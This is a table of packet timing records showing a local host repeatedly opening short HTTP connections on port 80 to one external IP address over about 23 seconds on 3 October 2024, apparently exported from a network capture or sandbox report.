Oct 3, 2024 09:21:57.209758997 CEST | 64400 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:57.211874008 CEST | 64400 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:57.220777035 CEST | 80 | 64400 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:57.220849991 CEST | 64400 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:57.230196953 CEST | 80 | 64400 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.009134054 CEST | 80 | 64400 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.009284019 CEST | 80 | 64400 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.009483099 CEST | 64400 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:58.009483099 CEST | 64400 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:58.015492916 CEST | 80 | 64400 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.158477068 CEST | 64401 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:58.163974047 CEST | 80 | 64401 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.164093018 CEST | 64401 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:58.166697025 CEST | 64401 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:58.171835899 CEST | 80 | 64401 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.171911955 CEST | 64401 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:58.179152012 CEST | 80 | 64401 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.968790054 CEST | 80 | 64401 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.968924046 CEST | 64401 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:58.969058990 CEST | 80 | 64401 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:58.969110966 CEST | 64401 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:58.973834038 CEST | 80 | 64401 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:59.138892889 CEST | 64402 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:59.143877029 CEST | 80 | 64402 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:59.144023895 CEST | 64402 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:59.146181107 CEST | 64402 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:59.151108027 CEST | 80 | 64402 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:59.151254892 CEST | 64402 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:59.156146049 CEST | 80 | 64402 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:59.912592888 CEST | 80 | 64402 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:59.912717104 CEST | 64402 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:59.915716887 CEST | 80 | 64402 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:59.915767908 CEST | 64402 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:59.929538965 CEST | 80 | 64402 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:00.057399988 CEST | 64403 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:00.066092968 CEST | 80 | 64403 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:00.066203117 CEST | 64403 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:00.068260908 CEST | 64403 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:00.075195074 CEST | 80 | 64403 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:00.075267076 CEST | 64403 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:00.080766916 CEST | 80 | 64403 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:00.875777006 CEST | 80 | 64403 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:00.875973940 CEST | 80 | 64403 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:00.875994921 CEST | 64403 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:00.876025915 CEST | 64403 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:00.880848885 CEST | 80 | 64403 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:01.028759956 CEST | 64404 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:01.036436081 CEST | 80 | 64404 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:01.036514997 CEST | 64404 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:01.038656950 CEST | 64404 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:01.051316023 CEST | 80 | 64404 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:01.051486015 CEST | 64404 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:01.067785978 CEST | 80 | 64404 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:02.986509085 CEST | 80 | 64404 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:02.986735106 CEST | 64404 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:02.987199068 CEST | 80 | 64404 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:02.987360001 CEST | 64404 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:02.998302937 CEST | 80 | 64404 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:03.142139912 CEST | 64405 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:03.149559975 CEST | 80 | 64405 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:03.149816036 CEST | 64405 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:03.152149916 CEST | 64405 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:03.157551050 CEST | 80 | 64405 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:03.157629013 CEST | 64405 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:03.162858963 CEST | 80 | 64405 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:03.927012920 CEST | 80 | 64405 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:03.927135944 CEST | 64405 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:03.927562952 CEST | 80 | 64405 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:03.927620888 CEST | 64405 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:03.932184935 CEST | 80 | 64405 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:04.084206104 CEST | 64406 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:04.101350069 CEST | 80 | 64406 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:04.101624012 CEST | 64406 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:04.103874922 CEST | 64406 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:04.115453005 CEST | 80 | 64406 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:04.115545034 CEST | 64406 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:04.122056961 CEST | 80 | 64406 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:04.921690941 CEST | 80 | 64406 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:04.921772957 CEST | 80 | 64406 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:04.921953917 CEST | 64406 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:04.921953917 CEST | 64406 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:04.926898956 CEST | 80 | 64406 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:05.326579094 CEST | 64407 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:05.331676960 CEST | 80 | 64407 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:05.331762075 CEST | 64407 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:05.334078074 CEST | 64407 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:05.338845968 CEST | 80 | 64407 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:05.338912010 CEST | 64407 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:05.343745947 CEST | 80 | 64407 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:06.114370108 CEST | 80 | 64407 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:06.114484072 CEST | 64407 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:06.115036011 CEST | 80 | 64407 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:06.115080118 CEST | 64407 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:06.119390965 CEST | 80 | 64407 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:06.261395931 CEST | 64408 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:06.273978949 CEST | 80 | 64408 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:06.274137020 CEST | 64408 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:06.277036905 CEST | 64408 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:06.283610106 CEST | 80 | 64408 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:06.283715963 CEST | 64408 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:06.290833950 CEST | 80 | 64408 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.060122967 CEST | 80 | 64408 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.060441017 CEST | 64408 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:07.062005043 CEST | 80 | 64408 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.062108994 CEST | 64408 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:07.070496082 CEST | 80 | 64408 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.199093103 CEST | 64409 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:07.214096069 CEST | 80 | 64409 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.214183092 CEST | 64409 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:07.216347933 CEST | 64409 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:07.225397110 CEST | 80 | 64409 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.225457907 CEST | 64409 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:07.234738111 CEST | 80 | 64409 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.996001959 CEST | 80 | 64409 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.996370077 CEST | 80 | 64409 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:07.996431112 CEST | 64409 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:07.998892069 CEST | 64409 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:08.024007082 CEST | 80 | 64409 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:08.273022890 CEST | 64410 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:08.285029888 CEST | 80 | 64410 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:08.285175085 CEST | 64410 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:08.302642107 CEST | 64410 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:08.313478947 CEST | 80 | 64410 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:08.313595057 CEST | 64410 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:08.323983908 CEST | 80 | 64410 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:09.068078041 CEST | 80 | 64410 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:09.068231106 CEST | 64410 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:09.068541050 CEST | 80 | 64410 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:09.068591118 CEST | 64410 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:09.073051929 CEST | 80 | 64410 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:09.217662096 CEST | 64411 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:09.222872019 CEST | 80 | 64411 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:09.223004103 CEST | 64411 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:09.225388050 CEST | 64411 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:09.230331898 CEST | 80 | 64411 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:09.230402946 CEST | 64411 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:09.235358953 CEST | 80 | 64411 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:10.003968000 CEST | 80 | 64411 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:10.004080057 CEST | 64411 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:10.004416943 CEST | 80 | 64411 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:10.004465103 CEST | 64411 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:10.010283947 CEST | 80 | 64411 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:10.157190084 CEST | 64412 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:10.323306084 CEST | 80 | 64412 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:10.323410988 CEST | 64412 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:10.326421022 CEST | 64412 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:10.331365108 CEST | 80 | 64412 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:10.331435919 CEST | 64412 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:10.336457968 CEST | 80 | 64412 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:11.079188108 CEST | 80 | 64412 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:11.079289913 CEST | 64412 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:11.079302073 CEST | 80 | 64412 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:11.079351902 CEST | 64412 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:11.084542990 CEST | 80 | 64412 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:11.227319002 CEST | 64413 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:11.232330084 CEST | 80 | 64413 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:11.232422113 CEST | 64413 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:11.234513044 CEST | 64413 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:11.239742994 CEST | 80 | 64413 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:11.239805937 CEST | 64413 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:11.249327898 CEST | 80 | 64413 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.003453970 CEST | 80 | 64413 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.003588915 CEST | 80 | 64413 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.003792048 CEST | 64413 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:12.003792048 CEST | 64413 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:12.009694099 CEST | 80 | 64413 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.152450085 CEST | 64414 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:12.163187981 CEST | 80 | 64414 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.163330078 CEST | 64414 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:12.165453911 CEST | 64414 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:12.172043085 CEST | 80 | 64414 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.172122955 CEST | 64414 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:12.178303957 CEST | 80 | 64414 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.893414021 CEST | 80 | 64414 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.893574953 CEST | 64414 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:12.893845081 CEST | 80 | 64414 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:12.893903971 CEST | 64414 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:12.898557901 CEST | 80 | 64414 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:13.043330908 CEST | 64415 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:13.059067965 CEST | 80 | 64415 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:13.059154034 CEST | 64415 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:13.061347961 CEST | 64415 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:13.068916082 CEST | 80 | 64415 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:13.068984985 CEST | 64415 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:13.073956013 CEST | 80 | 64415 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:13.853063107 CEST | 80 | 64415 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:13.853370905 CEST | 64415 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:13.853501081 CEST | 80 | 64415 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:13.853564024 CEST | 64415 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:13.862095118 CEST | 80 | 64415 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:13.995521069 CEST | 64416 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.001089096 CEST | 80 | 64416 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:14.001178026 CEST | 64416 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.003642082 CEST | 64416 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.008919954 CEST | 80 | 64416 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:14.008975029 CEST | 64416 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.014143944 CEST | 80 | 64416 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:14.776112080 CEST | 80 | 64416 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:14.776179075 CEST | 80 | 64416 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:14.776328087 CEST | 64416 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.776377916 CEST | 64416 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.782650948 CEST | 80 | 64416 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:14.921832085 CEST | 64417 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.927777052 CEST | 80 | 64417 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:14.927918911 CEST | 64417 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.930037022 CEST | 64417 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.935880899 CEST | 80 | 64417 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:14.936067104 CEST | 64417 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:14.942049980 CEST | 80 | 64417 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:15.763972998 CEST | 80 | 64417 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:15.764133930 CEST | 64417 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:15.766371965 CEST | 80 | 64417 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:15.766482115 CEST | 64417 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:15.769372940 CEST | 80 | 64417 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:15.905189991 CEST | 64418 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:15.918740988 CEST | 80 | 64418 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:15.918838978 CEST | 64418 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:15.921727896 CEST | 64418 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:15.929102898 CEST | 80 | 64418 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:15.929178953 CEST | 64418 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:15.934868097 CEST | 80 | 64418 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:16.667747974 CEST | 80 | 64418 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:16.667875051 CEST | 64418 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:16.668628931 CEST | 80 | 64418 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:16.668695927 CEST | 64418 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:16.672756910 CEST | 80 | 64418 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:16.815005064 CEST | 64419 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:16.820117950 CEST | 80 | 64419 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:16.820242882 CEST | 64419 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:16.822302103 CEST | 64419 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:16.827244043 CEST | 80 | 64419 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:16.827330112 CEST | 64419 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:16.832212925 CEST | 80 | 64419 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:17.525538921 CEST | 80 | 64419 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:17.525800943 CEST | 80 | 64419 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:17.525911093 CEST | 64419 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:17.536253929 CEST | 64419 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:17.541316986 CEST | 80 | 64419 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:17.691169024 CEST | 64420 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:17.696270943 CEST | 80 | 64420 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:17.696378946 CEST | 64420 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:17.698632956 CEST | 64420 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:17.703607082 CEST | 80 | 64420 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:17.703674078 CEST | 64420 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:17.708511114 CEST | 80 | 64420 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:18.554850101 CEST | 80 | 64420 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:18.554965019 CEST | 80 | 64420 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:18.555021048 CEST | 64420 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:18.555186987 CEST | 64420 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:18.559915066 CEST | 80 | 64420 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:18.701395988 CEST | 64421 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:18.706377029 CEST | 80 | 64421 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:18.706465960 CEST | 64421 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:18.709377050 CEST | 64421 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:18.714226007 CEST | 80 | 64421 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:18.714301109 CEST | 64421 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:18.719157934 CEST | 80 | 64421 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:19.379185915 CEST | 80 | 64421 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:19.379229069 CEST | 80 | 64421 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:19.379297018 CEST | 64421 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:19.379714012 CEST | 64421 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:19.384819031 CEST | 80 | 64421 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:19.534192085 CEST | 64422 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:19.539474010 CEST | 80 | 64422 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:19.539597034 CEST | 64422 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:19.542762041 CEST | 64422 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:19.547653913 CEST | 80 | 64422 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:19.547744036 CEST | 64422 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:19.552742958 CEST | 80 | 64422 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:20.358504057 CEST | 80 | 64422 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:20.358526945 CEST | 80 | 64422 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:20.358625889 CEST | 64422 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:20.368416071 CEST | 64422 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:20.373251915 CEST | 80 | 64422 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:20.553884029 CEST | 64423 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:20.559114933 CEST | 80 | 64423 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:20.559228897 CEST | 64423 | 80 | 192.168.2.11 | 45.149.241.169 |
